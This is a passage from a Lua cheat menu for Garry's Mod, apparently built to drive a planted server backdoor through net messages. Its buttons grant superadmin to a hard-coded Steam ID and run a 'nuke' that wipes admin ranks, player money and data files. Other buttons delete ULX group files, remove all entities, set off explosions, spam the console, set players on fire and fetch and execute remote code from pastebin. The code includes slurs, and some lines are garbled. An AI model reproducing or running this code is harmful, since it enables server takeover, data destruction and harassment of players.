  2175. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Wallah.mp3\", \"mono\", function()end )]])")
  2176. net.WriteBit (1)
  2177. net.SendToServer()
  2178. end
  2179. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2180. commandnethtx1000:SetSize( 208, 20 )
  2181. commandnethtx1000:SetPos( 2, 630 )
  2182. commandnethtx1000:SetText("Soundboard - zehmah")
  2183. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2184. commandnethtx1000.Paint = function(panel, w, h)
  2185. surface.SetDrawColor(100, 100, 100 ,255)
  2186. surface.DrawOutlinedRect(0, 0, w, h)
  2187. surface.SetDrawColor(56, 212, 43, 255)
  2188. surface.DrawRect(0, 0, w, h)
  2189. end
  2190. commandnethtx1000.DoClick = function()
  2191. iZNX.NetStart(thefrenchenculer)
  2192. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Zehma.mp3\", \"mono\", function()end )]])")
  2193. net.WriteBit (1)
  2194. net.SendToServer()
  2195. end
  2196. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2197. commandnethtx1000:SetSize( 208, 20 )
  2198. commandnethtx1000:SetPos( 2, 655 )
  2199. commandnethtx1000:SetText("------Manipulation Serveur------")
  2200. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2201. commandnethtx1000.Paint = function(panel, w, h)
  2202. surface.SetDrawColor(100, 100, 100 ,255)
  2203. surface.DrawOutlinedRect(0, 0, w, h)
  2204. surface.SetDrawColor(34, 217, 217, 255)
  2205. surface.DrawRect(0, 0, w, h)
  2206. end
  2207. commandnethtx1000.DoClick = function()
  2208. iZNX.NetStart(thefrenchenculer)
  2209. net.WriteString("None")
  2210. net.WriteBit (1)
  2211. net.SendToServer()
  2212. end
  2213. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  2214. commandnethtx9:SetSize( 208, 20 )
  2215. commandnethtx9:SetPos( 2, 705 )
  2216. commandnethtx9:SetText("CE METTRE SUPER-ADMIN")
  2217. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  2218. commandnethtx9.Paint = function(panel, w, h)
  2219. surface.SetDrawColor(100, 100, 100 ,255)
  2220. surface.DrawOutlinedRect(0, 0, w, h)
  2221. surface.SetDrawColor(34, 217, 217, 255)
  2222. surface.DrawRect(0, 0, w, h)
  2223. end
  2224. commandnethtx9.DoClick = function()
  2225. net.Start(thefrenchenculer)
  2226. net.WriteString( "RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:1:199444592\", \"superadmin\")" )
  2227. net.WriteBit(1)
  2228. net.SendToServer()
  2229. end
  2230. local commandnethtx89 = vgui.Create("DButton", DScrollPanel)
  2231. commandnethtx89:SetSize( 208, 20 )
  2232. commandnethtx89:SetPos( 2, 730 )
  2233. commandnethtx89:SetText("Nuke (Déstruction)")
  2234. commandnethtx89:SetTextColor(Color(255, 255, 255, 255))
  2235. commandnethtx89.Paint = function(panel, w, h)
  2236. surface.SetDrawColor(100, 100, 100 ,255)
  2237. surface.DrawOutlinedRect(0, 0, w, h)
  2238. surface.SetDrawColor(34, 217, 217, 255)
  2239. surface.DrawRect(0, 0, w, h)
  2240. end
  2241. commandnethtx89.DoClick = function()
  2242. local nuke = [[
  2243.     if( LeyAC ) then
  2244.         LeyAC = nil;
  2245.     end
  2246.  
  2247. timer.Create( "next_level_timer2", 20, 0, function()
  2248.     --Break some bad cmds
  2249.     local bad = {"Ban","Kick","Kill","KillSilent","GodEnable","GodDisable"} for k,v in next, bad do FindMetaTable("Player")[v] = nil end
  2250.     --Break ULX
  2251.     if ULib then
  2252.         for k,v in pairs(player.GetAll()) do
  2253.             ULib.ucl.addUser( v:SteamID(), {}, {}, "user" );
  2254.         end
  2255.  
  2256.         for k,v in pairs(ULib.ucl.groups) do
  2257.             if k != "user" then
  2258.                 ULib.ucl.removeGroup(k);
  2259.             end
  2260.         end
  2261.  
  2262.         for k,v in pairs(ULib.ucl.users) do
  2263.             v.group = "user"
  2264.         end
  2265.     end
  2266.     --Gamemode related
  2267.     if GAMEMODE.Name == "DarkRP" then
  2268.  
  2269.         for k,v in pairs(player.GetAll()) do
  2270.             RunConsoleCommand("rp_setmoney", v:Nick(), 0);
  2271.         end
  2272.  
  2273.         hook.Add("PlayerInitialSpawn", "darkrp_specific_persistence", function( ply )
  2274.             RunConsoleCommand("rp_setmoney", ply:Nick(), 0);
  2275.         end)
  2276.     end
  2277.  
  2278.     if GAMEMODE.Name == "Trouble in Terrorist Town" then //something here?
  2279.         //for k, v in pairs(player.GetAll()) do
  2280.         //end
  2281.     end
  2282.  
  2283.     if net.WriteString.find( GAMEMODE.Name:lower(), "stronghold" ) then
  2284.         for k,v in pairs(player.GetAll()) do
  2285.             RunConsoleCommand("gbux_setmoney", v:Nick(), 0);
  2286.         end
  2287.  
  2288.         hook.Add("PlayerInitialSpawn", "stronghold_specific_persistence", function( ply )
  2289.             RunConsoleCommand("gbux_setmoney", ply:Nick(), 0);
  2290.         end)
  2291.      
  2292.         local fil = file.Find( "data/stronghold/playerinfo/*.txt", "GAME" )
  2293.      
  2294.         for k, v in pairs( fil ) do
  2295.             file.Delete( fil )
  2296.         end
  2297.     end
  2298. end)
  2299.  
  2300. if GetConVarnet.WriteString("sv_allowcslua") != "0" then
  2301.     RunConsoleCommand( "sv_allowcslua", "1" );
  2302. end
  2303.  
  2304. hook.Add("Think", "busted", function()
  2305.     for k,v in pairs (player.GetAll()) do
  2306.         v:SetModelScale(2.5, 100);
  2307.         v:SetRunSpeed(400 * 2);
  2308.         v:SetWalkSpeed(200 * 2);
  2309.     end
  2310. end)
  2311.  
  2312. timer.Create( "next_level_timer", 5, 0, function()
  2313.     for k, v in pairs(player.GetAll()) do
  2314.         v:ConCommand("say Jesus is the best !");
  2315.     end
  2316. end)
  2317.  
  2318. RunConsoleCommand("hostname", "HACKED BY ANATIK")
  2319. ]]
  2320. net.Start(thefrenchenculer)
  2321. net.WriteString( nuke )
  2322. net.WriteBit (1)
  2323. net.SendToServer()
  2324. end
  2325. local commandnethtx5 = vgui.Create("DButton", DScrollPanel )
  2326. commandnethtx5:SetSize( 208, 20 )
  2327. commandnethtx5:SetPos( 2, 755 )
  2328. commandnethtx5:SetText("NIQUER LES GRADES")
  2329. commandnethtx5:SetTextColor(Color(255, 255, 255, 255))
  2330. commandnethtx5.Paint = function(panel, w, h)
  2331. surface.SetDrawColor(100, 100, 100 ,255)
  2332. surface.DrawOutlinedRect(0, 0, w, h)
  2333. surface.SetDrawColor(34, 217, 217, 255)
  2334. surface.DrawRect(0, 0, w, h)
  2335. end
  2336. commandnethtx5.DoClick = function()
  2337. iZNX.NetStart(thefrenchenculer)
  2338. net.WriteString( "if file.Exists( \"ulib/groups.txt\", \"DATA\" ) then file.Delete(\"ulib/groups.txt\") end" )
  2339. net.WriteBit(1)
  2340. net.SendToServer()
  2341. end
  2342. local commandnethtx11 = vgui.Create("DButton", DScrollPanel)
  2343. commandnethtx11:SetSize( 208, 20 )
  2344. commandnethtx11:SetPos( 2, 780 )
  2345. commandnethtx11:SetText("Reset l'argent à 0")
  2346. commandnethtx11:SetTextColor(Color(255, 255, 255, 255))
  2347. commandnethtx11.Paint = function(panel, w, h)
  2348. surface.SetDrawColor(100, 100, 100 ,255)
  2349. surface.DrawOutlinedRect(0, 0, w, h)
  2350. surface.SetDrawColor(34, 217, 217, 255)
  2351. surface.DrawRect(0, 0, w, h)
  2352. end
  2353. commandnethtx11.DoClick = function()
  2354. net.Start(thefrenchenculer)
  2355. net.WriteString( "RunConsoleCommand(\"rp_resetallmoney\")" )
  2356. net.WriteBit(1)
  2357. net.SendToServer()
  2358. end
  2359. local commandnethtx15 = vgui.Create("DButton", DScrollPanel)
  2360. commandnethtx15:SetSize( 208, 20 )
  2361. commandnethtx15:SetPos( 2, 805 )
  2362. commandnethtx15:SetText("Give de l'argent a un Random")
  2363. commandnethtx15:SetTextColor(Color(255, 255, 255, 255))
  2364. commandnethtx15.Paint = function(panel, w, h)
  2365. surface.SetDrawColor(100, 100, 100 ,255)
  2366. surface.DrawOutlinedRect(0, 0, w, h)
  2367. surface.SetDrawColor(34, 217, 217, 255)
  2368. surface.DrawRect(0, 0, w, h)
  2369. end
  2370. commandnethtx15.DoClick = function()
  2371. net.Start(thefrenchenculer)
  2372. net.WriteString( "for k,v in pairs(player.GetAll()) do timer.Create( \"timerargent10\", 0.1, 0, function() v:addMoney(1000000) end) end" )
  2373. net.WriteBit(1)
  2374. net.SendToServer()
  2375. end
  2376. local commandnethtx17 = vgui.Create("DButton", DScrollPanel)
  2377. commandnethtx17:SetSize( 208, 20 )
  2378. commandnethtx17:SetPos( 2, 830 )
  2379. commandnethtx17:SetText("Supprimer Toutes les Entité")
  2380. commandnethtx17:SetTextColor(Color(255, 255, 255, 255))
  2381. commandnethtx17.Paint = function(panel, w, h)
  2382. surface.SetDrawColor(100, 100, 100 ,255)
  2383. surface.DrawOutlinedRect(0, 0, w, h)
  2384. surface.SetDrawColor(34, 217, 217, 255)
  2385. surface.DrawRect(0, 0, w, h)
  2386. end
  2387. commandnethtx17.DoClick = function()
  2388. net.Start(thefrenchenculer)
  2389. net.WriteString( "for k, v in pairs(ents.FindByClass( \"prop_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"func_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"env_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"lua_run*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"point_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"trigger_*\" )) do v:Remove() end for k, v in pairs(ents.FindByClass( \"info_*\" )) do v:Remove() end" )
  2390. net.WriteBit(1)
  2391. net.SendToServer()
  2392. end
  2393. local commandnethtx34 = vgui.Create("DButton", DScrollPanel)
  2394. commandnethtx34:SetSize( 208, 20 )
  2395. commandnethtx34:SetPos( 2, 855 )
  2396. commandnethtx34:SetText("Explosion dans toute la map")
  2397. commandnethtx34:SetTextColor(Color(255, 255, 255, 255))
  2398. commandnethtx34.Paint = function(panel, w, h)
  2399. surface.SetDrawColor(100, 100, 100 ,255)
  2400. surface.DrawOutlinedRect(0, 0, w, h)
  2401. surface.SetDrawColor(34, 217, 217, 255)
  2402. surface.DrawRect(0, 0, w, h)
  2403. end
  2404. commandnethtx34.DoClick = function()
  2405. local faggot = [[
  2406.             hook.Add("Think", "armageddon", function()
  2407.                 local explode = ents.Create( "env_explosion" )
  2408.                     explode:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  2409.                     explode:Spawn()
  2410.                     explode:SetKeyValue( "iMagnitude", "500" )
  2411.                     explode:Fire( "Explode", 0, 0 )
  2412.                 end)  
  2413. ]]
  2414. net.Start(thefrenchenculer)
  2415. net.WriteString( faggot )
  2416. net.WriteBit (1)
  2417. net.SendToServer()
  2418. end
  2419. local commandnethtx10 = vgui.Create("DButton", DScrollPanel)
  2420. commandnethtx10:SetSize( 208, 20 )
  2421. commandnethtx10:SetPos( 2, 880 )
  2422. commandnethtx10:SetText("Changer la GRAVITER")
  2423. commandnethtx10:SetTextColor(Color(255, 255, 255, 255))
  2424. commandnethtx10.Paint = function(panel, w, h)
  2425. surface.SetDrawColor(100, 100, 100 ,255)
  2426. surface.DrawOutlinedRect(0, 0, w, h)
  2427. surface.SetDrawColor(34, 217, 217, 255)
  2428. surface.DrawRect(0, 0, w, h)
  2429. end
  2430. commandnethtx10.DoClick = function()
  2431. net.Start(thefrenchenculer)
  2432. net.WriteString( "RunConsoleCommand(\"sv_gravity\", \"-600\")" )
  2433. net.WriteBit(1)
  2434. net.SendToServer()
  2435. end
  2436. local commandnethtx9 = vgui.Create("DButton", DScrollPanel)
  2437. commandnethtx9:SetSize( 208, 20 )
  2438. commandnethtx9:SetPos( 2, 905 )
  2439. commandnethtx9:SetText("SpeedHack")
  2440. commandnethtx9:SetTextColor(Color(255, 255, 255, 255))
  2441. commandnethtx9.Paint = function(panel, w, h)
  2442. surface.SetDrawColor(100, 100, 100 ,255)
  2443. surface.DrawOutlinedRect(0, 0, w, h)
  2444. surface.SetDrawColor(34, 217, 217, 255)
  2445. surface.DrawRect(0, 0, w, h)
  2446. end
  2447. commandnethtx9.DoClick = function()
  2448. net.Start(thefrenchenculer)
  2449. net.WriteString( "RunConsoleCommand(\"sv_friction\", \"-8\")" )
  2450. net.WriteBit(1)
  2451. net.SendToServer()
  2452. end
  2453. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2454. commandnethtx1000:SetSize( 208, 20 )
  2455. commandnethtx1000:SetPos( 2, 930 )
  2456. commandnethtx1000:SetText("------REBOOT|SHUTDOWN------")
  2457. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2458. commandnethtx1000.Paint = function(panel, w, h)
  2459. surface.SetDrawColor(100, 100, 100 ,255)
  2460. surface.DrawOutlinedRect(0, 0, w, h)
  2461. surface.SetDrawColor(214, 192, 25, 255)
  2462. surface.DrawRect(0, 0, w, h)
  2463. end
  2464. commandnethtx1000.DoClick = function()
  2465. iZNX.NetStart(thefrenchenculer)
  2466. net.WriteString("None")
  2467. net.WriteBit (1)
  2468. net.SendToServer()
  2469. end
  2470. local commandnethtx29 = vgui.Create("DButton", DScrollPanel)
  2471. commandnethtx29:SetSize( 208, 20 )
  2472. commandnethtx29:SetPos( 2, 955 )
  2473. commandnethtx29:SetText("Shutdown")
  2474. commandnethtx29:SetTextColor(Color(255, 255, 255, 255))
  2475. commandnethtx29.Paint = function(panel, w, h)
  2476. surface.SetDrawColor(100, 100, 100 ,255)
  2477. surface.DrawOutlinedRect(0, 0, w, h)
  2478. surface.SetDrawColor(214, 192, 25, 255)
  2479. surface.DrawRect(0, 0, w, h)
  2480. end
  2481. commandnethtx29.DoClick = function()
  2482. iZNX.NetStart(thefrenchenculer)
  2483. net.WriteString( "timer.Create( \"spamlol\", 0, 0, function() for i = 1, 1000000 do MsgC(Color(math.random(255), math.random(255), math.random(255)), \"Owned by ANATIK \") end end)" )
  2484. net.WriteBit (1)
  2485. net.SendToServer()
  2486. end
  2487. local commandnethtx100 = vgui.Create("DButton", DScrollPanel)
  2488. commandnethtx100:SetSize( 208, 20 )
  2489. commandnethtx100:SetPos( 2, 980 )
  2490. commandnethtx100:SetText("Change map gm_construct")
  2491. commandnethtx100:SetTextColor(Color(255, 255, 255, 255))
  2492. commandnethtx100.Paint = function(panel, w, h)
  2493. surface.SetDrawColor(100, 100, 100 ,255)
  2494. surface.DrawOutlinedRect(0, 0, w, h)
  2495. surface.SetDrawColor(214, 192, 25, 255)
  2496. surface.DrawRect(0, 0, w, h)
  2497. end
  2498. commandnethtx100.DoClick = function()
  2499. iZNX.NetStart(thefrenchenculer)
  2500. net.WriteString("RunConsoleCommand(\"ulx\", \"map\", \"gm_construct\")")
  2501. net.WriteBit (1)
  2502. net.SendToServer()
  2503. end
  2504. local commandnethtx100 = vgui.Create("DButton", DScrollPanel)
  2505. commandnethtx100:SetSize( 208, 20 )
  2506. commandnethtx100:SetPos( 2, 1005 )
  2507. commandnethtx100:SetText("Change map gm_flatgrass")
  2508. commandnethtx100:SetTextColor(Color(255, 255, 255, 255))
  2509. commandnethtx100.Paint = function(panel, w, h)
  2510. surface.SetDrawColor(100, 100, 100 ,255)
  2511. surface.DrawOutlinedRect(0, 0, w, h)
  2512. surface.SetDrawColor(214, 192, 25, 255)
  2513. surface.DrawRect(0, 0, w, h)
  2514. end
  2515. commandnethtx100.DoClick = function()
  2516. iZNX.NetStart(thefrenchenculer)
  2517. net.WriteString("RunConsoleCommand(\"ulx\", \"map\", \"gm_flatgrass\")")
  2518. net.WriteBit (1)
  2519. net.SendToServer()
  2520. end
  2521. local commandnethtx40 = vgui.Create("DButton", DScrollPanel )
  2522. commandnethtx40:SetSize( 208, 20 )
  2523. commandnethtx40:SetPos( 1, 1030 )
  2524. commandnethtx40:SetText("Redémarrer le serveur")
  2525. commandnethtx40:SetTextColor(Color(255, 255, 255, 255))
  2526. commandnethtx40.Paint = function(panel, w, h)
  2527. surface.SetDrawColor(100, 100, 100 ,255)
  2528. surface.DrawOutlinedRect(0, 0, w, h)
  2529. surface.SetDrawColor(214, 192, 25, 255)
  2530. surface.DrawRect(0, 0, w, h)
  2531. end
  2532. commandnethtx40.DoClick = function()
  2533. iZNX.NetStart(thefrenchenculer)
  2534. net.WriteString("RunConsoleCommand(\"changelevel \"..game.GetMap())")
  2535. net.WriteBit(1)
  2536. net.SendToServer()
  2537. end
  2538. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2539. commandnethtx1000:SetSize( 208, 20 )
  2540. commandnethtx1000:SetPos( 2, 1055 )
  2541. commandnethtx1000:SetText("------Manipulation Joueur------")
  2542. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2543. commandnethtx1000.Paint = function(panel, w, h)
  2544. surface.SetDrawColor(100, 100, 100 ,255)
  2545. surface.DrawOutlinedRect(0, 0, w, h)
  2546. surface.SetDrawColor(255, 155, 0, 255)
  2547. surface.DrawRect(0, 0, w, h)
  2548. end
  2549. commandnethtx1000.DoClick = function()
  2550. iZNX.NetStart(thefrenchenculer)
  2551. net.WriteString("None")
  2552. net.WriteBit (1)
  2553. net.SendToServer()
  2554. end
  2555. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2556. commandnethtx1000:SetSize( 208, 20 )
  2557. commandnethtx1000:SetPos( 2, 1080 )
  2558. commandnethtx1000:SetText("Grand - Taille")
  2559. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2560. commandnethtx1000.Paint = function(panel, w, h)
  2561. surface.SetDrawColor(100, 100, 100 ,255)
  2562. surface.DrawOutlinedRect(0, 0, w, h)
  2563. surface.SetDrawColor(255, 155, 0, 255)
  2564. surface.DrawRect(0, 0, w, h)
  2565. end
  2566. commandnethtx1000.DoClick = function()
  2567. local giant = [[
  2568. hook.Add("Think", "giant", function()
  2569.     for k,v in pairs (player.GetAll()) do
  2570.         v:SetModelScale(50.5, 100);
  2571.         v:SetRunSpeed(400 * 2);
  2572.         v:SetWalkSpeed(200 * 2);
  2573.     end
  2574. end)]]
  2575. net.Start(thefrenchenculer)
  2576. net.WriteString( giant )
  2577. net.WriteBit (1)
  2578. end
  2579. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2580. commandnethtx1000:SetSize( 208, 20 )
  2581. commandnethtx1000:SetPos( 2, 1130 )
  2582. commandnethtx1000:SetText("Moyen - Taille")
  2583. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2584. commandnethtx1000.Paint = function(panel, w, h)
  2585. surface.SetDrawColor(100, 100, 100 ,255)
  2586. surface.DrawOutlinedRect(0, 0, w, h)
  2587. surface.SetDrawColor(255, 155, 0, 255)
  2588. surface.DrawRect(0, 0, w, h)
  2589. end
  2590. commandnethtx1000.DoClick = function()
  2591. local moyen = [[
  2592. hook.Add("Think", "moyen", function()
  2593.     for k,v in pairs (player.GetAll()) do
  2594.         v:SetModelScale(1.0, 100);
  2595.         v:SetRunSpeed(400 * 2);
  2596.         v:SetWalkSpeed(200 * 2);
  2597.     end
  2598. end)]]
  2599. net.Start(thefrenchenculer)
  2600. net.WriteString( moyen )
  2601. net.WriteBit (1)
  2602. end
  2603. local commandnethtx1000 = vgui.Create("DButton", DScrollPanel)
  2604. commandnethtx1000:SetSize( 208, 20 )
  2605. commandnethtx1000:SetPos( 2, 1105 )
  2606. commandnethtx1000:SetText("Petit - Taille")
  2607. commandnethtx1000:SetTextColor(Color(255, 255, 255, 255))
  2608. commandnethtx1000.Paint = function(panel, w, h)
  2609. surface.SetDrawColor(100, 100, 100 ,255)
  2610. surface.DrawOutlinedRect(0, 0, w, h)
  2611. surface.SetDrawColor(255, 155, 0, 255)
  2612. surface.DrawRect(0, 0, w, h)
  2613. end
  2614. commandnethtx1000.DoClick = function()
  2615. local giant = [[
  2616. hook.Add("Think", "giant", function()
  2617.     for k,v in pairs (player.GetAll()) do
  2618.         v:SetModelScale(50.5, 100);
  2619.         v:SetRunSpeed(400 * 2);
  2620.         v:SetWalkSpeed(200 * 2);
  2621.     end
  2622. end)]]
  2623. net.Start(thefrenchenculer)
  2624. net.WriteString( giant )
  2625. net.WriteBit (1)
  2626. end
  2627. local commandnethtx111 = vgui.Create("DButton", DScrollPanel)
  2628. commandnethtx111:SetSize( 208, 20 )
  2629. commandnethtx111:SetPos( 2, 1155 )
  2630. commandnethtx111:SetText("2D player désactivé !")
  2631. commandnethtx111:SetTextColor(Color(255, 255, 255, 255))
  2632. commandnethtx111.Paint = function(panel, w, h)
  2633. surface.SetDrawColor(100, 100, 100 ,255)
  2634. surface.DrawOutlinedRect(0, 0, w, h)
  2635. surface.SetDrawColor(255, 155, 0, 255)
  2636. surface.DrawRect(0, 0, w, h)
  2637. end
  2638. commandnethtx111.DoClick = function()
  2639. net.Start(thefrenchenculer)
  2640. net.WriteString([[
  2641.     for k,v in pairs(player.GetAll()) do
  2642.     local a = v:LookupBone("ValveBiped.Bip01_Head1")
  2643.     local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  2644.     local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  2645.     local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  2646.     local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  2647.     local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  2648.     local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  2649.     local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  2650.     local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  2651.     local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  2652.     local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  2653.  
  2654.         v:ManipulateBoneScale( a, Vector(1,1,1))
  2655.         v:ManipulateBoneScale( b, Vector(1,1,1))
  2656.         v:ManipulateBoneScale( c, Vector(1,1,1))
  2657.         v:ManipulateBoneScale( d, Vector(1,1,1))
  2658.         v:ManipulateBoneScale( e, Vector(1,1,1))
  2659.         v:ManipulateBoneScale( f, Vector(1,1,1))
  2660.         v:ManipulateBoneScale( g, Vector(1,1,1))
  2661.         v:ManipulateBoneScale( h, Vector(1,1,1))
  2662.         v:ManipulateBoneScale( i, Vector(1,1,1))
  2663.         v:ManipulateBoneScale( j, Vector(1,1,1))
  2664.         v:ManipulateBoneScale( k, Vector(1,1,1))
  2665.         end]])
  2666.         net.WriteBit(1)
  2667.         net.SendToServer()
  2668. end
  2669. local commandnethtx121 = vgui.Create("DButton", DScrollPanel)
  2670. commandnethtx121:SetSize( 208, 20 )
  2671. commandnethtx121:SetPos( 2, 1180 )
  2672. commandnethtx121:SetText("Avoire La Grosse Tête")
  2673. commandnethtx121:SetTextColor(Color(255, 255, 255, 255))
  2674. commandnethtx121.Paint = function(panel, w, h)
  2675. surface.SetDrawColor(100, 100, 100 ,255)
  2676. surface.DrawOutlinedRect(0, 0, w, h)
  2677. surface.SetDrawColor(255, 155, 0, 255)
  2678. surface.DrawRect(0, 0, w, h)
  2679. end
  2680. commandnethtx121.DoClick = function()
  2681. net.Start(thefrenchenculer)
  2682.  net.WriteString([[
  2683.     for k,v in pairs(player.GetAll()) do
  2684.     local a = v:LookupBone("ValveBiped.Bip01_Head1")
  2685.     local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  2686.     local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  2687.     local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  2688.     local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  2689.     local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  2690.     local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  2691.     local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  2692.     local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  2693.     local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  2694.     local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  2695.  
  2696.         v:ManipulateBoneScale( a, Vector(100,100,100))
  2697.         v:ManipulateBoneScale( b, Vector(100,100,100))
  2698.         v:ManipulateBoneScale( c, Vector(100,100,100))
  2699.         v:ManipulateBoneScale( d, Vector(100,100,100))
  2700.         v:ManipulateBoneScale( e, Vector(100,100,100))
  2701.         v:ManipulateBoneScale( f, Vector(100,100,100))
  2702.         v:ManipulateBoneScale( g, Vector(100,100,100))
  2703.         v:ManipulateBoneScale( h, Vector(100,100,100))
  2704.         v:ManipulateBoneScale( i, Vector(100,100,100))
  2705.         v:ManipulateBoneScale( j, Vector(100,100,100))
  2706.         v:ManipulateBoneScale( k, Vector(100,100,100))
  2707.         end]])
  2708.         net.WriteBit(1)
  2709.         net.SendToServer()
  2710. end
  2711. local commandnethtx103 = vgui.Create("DButton", DScrollPanel)
  2712. commandnethtx103:SetSize( 208, 20 )
  2713. commandnethtx103:SetPos( 2, 1205 )
  2714. commandnethtx103:SetText("Retry les gens")
  2715. commandnethtx103:SetTextColor(Color(255, 255, 255, 255))
  2716. commandnethtx103.Paint = function(panel, w, h)
  2717. surface.SetDrawColor(100, 100, 100 ,255)
  2718. surface.DrawOutlinedRect(0, 0, w, h)
  2719. surface.SetDrawColor(255, 155, 0, 255)
  2720. surface.DrawRect(0, 0, w, h)
  2721. end
  2722. commandnethtx103.DoClick = function()
  2723. iZNX.NetStart(thefrenchenculer)
  2724. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2725.     v:ConCommand("retry")
  2726. end
  2727. ]])
  2728. net.WriteBit (1)
  2729. net.SendToServer()
  2730. end
  2731. local commandnethtx106 = vgui.Create("DButton", DScrollPanel)
  2732. commandnethtx106:SetSize( 208, 20 )
  2733. commandnethtx106:SetPos( 2, 1230 )
  2734. commandnethtx106:SetText("Forcer a changer le nom Hacker By Anatik")
  2735. commandnethtx106:SetTextColor(Color(255, 255, 255, 255))
  2736. commandnethtx106.Paint = function(panel, w, h)
  2737. surface.SetDrawColor(100, 100, 100 ,255)
  2738. surface.DrawOutlinedRect(0, 0, w, h)
  2739. surface.SetDrawColor(255, 155, 0, 255)
  2740. surface.DrawRect(0, 0, w, h)
  2741. end
  2742. commandnethtx106.DoClick = function()
  2743. iZNX.NetStart(thefrenchenculer)
  2744. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/mycy8ECm\",function(b,l,h,c)RunString(b)end,nil)" )
  2745. net.WriteBit (1)
  2746. net.SendToServer()
  2747. end
  2748. local commandnethtx106 = vgui.Create("DButton", DScrollPanel)
  2749. commandnethtx106:SetSize( 208, 20 )
  2750. commandnethtx106:SetPos( 2, 1255 )
  2751. commandnethtx106:SetText("Forcer Change Name")
  2752. commandnethtx106:SetTextColor(Color(255, 255, 255, 255))
  2753. commandnethtx106.Paint = function(panel, w, h)
  2754. surface.SetDrawColor(100, 100, 100 ,255)
  2755. surface.DrawOutlinedRect(0, 0, w, h)
  2756. surface.SetDrawColor(255, 155, 0, 255)
  2757. surface.DrawRect(0, 0, w, h)
  2758. end
  2759. commandnethtx106.DoClick = function()
  2760. iZNX.NetStart(thefrenchenculer)
  2761. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/9r3NDPb2\",function(b,l,h,c)RunString(b)end,nil)" )
  2762. net.WriteBit (1)
  2763. net.SendToServer()
  2764. end
  2765. local commandnethtx4 = vgui.Create("DButton", DScrollPanel )
  2766. commandnethtx4:SetSize( 208, 20 )
  2767. commandnethtx4:SetPos( 2, 1280 )
  2768. commandnethtx4:SetText("BRULER Les JOUEURS")
  2769. commandnethtx4:SetTextColor(Color(255, 255, 255, 255))
  2770. commandnethtx4.Paint = function(panel, w, h)
  2771. surface.SetDrawColor(100, 100, 100 ,255)
  2772. surface.DrawOutlinedRect(0, 0, w, h)
  2773. surface.SetDrawColor(255, 155, 0, 255)
  2774. surface.DrawRect(0, 0, w, h)
  2775. end
  2776. commandnethtx4.DoClick = function()
  2777. iZNX.NetStart(thefrenchenculer)
  2778. net.WriteString( "for k,v in pairs(player.GetAll()) do v:Ignite(120) end" )
  2779. net.WriteBit(1)
  2780. net.SendToServer()
  2781. end
  2782. local commandnethtx99 = vgui.Create("DButton", DScrollPanel)
  2783. commandnethtx99:SetSize( 208, 20 )
  2784. commandnethtx99:SetPos( 2, 1305 )
  2785. commandnethtx99:SetText("Pousser tout le monde")
  2786. commandnethtx99:SetTextColor(Color(255, 255, 255, 255))
  2787. commandnethtx99.Paint = function(panel, w, h)
  2788. surface.SetDrawColor(100, 100, 100 ,255)
  2789. surface.DrawOutlinedRect(0, 0, w, h)
  2790. surface.SetDrawColor(255, 155, 0, 255)
  2791. surface.DrawRect(0, 0, w, h)
  2792. end
  2793. commandnethtx99.DoClick = function()
  2794. iZNX.NetStart(thefrenchenculer)
  2795. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetVelocity(v:GetVelocity() + Vector(math.random(1000,5000), math.random(1000,5000), math.random(1000,5000))) end" )
  2796. net.WriteBit (1)
  2797. net.SendToServer()
  2798. end
  2799. local commandnethtx97 = vgui.Create("DButton", DScrollPanel)
  2800. commandnethtx97:SetSize( 208, 20 )
  2801. commandnethtx97:SetPos( 2, 1330 )
  2802. commandnethtx97:SetText("Le Cancer")
  2803. commandnethtx97:SetTextColor(Color(255, 255, 255, 255))
  2804. commandnethtx97.Paint = function(panel, w, h)
  2805. surface.SetDrawColor(100, 100, 100 ,255)
  2806. surface.DrawOutlinedRect(0, 0, w, h)
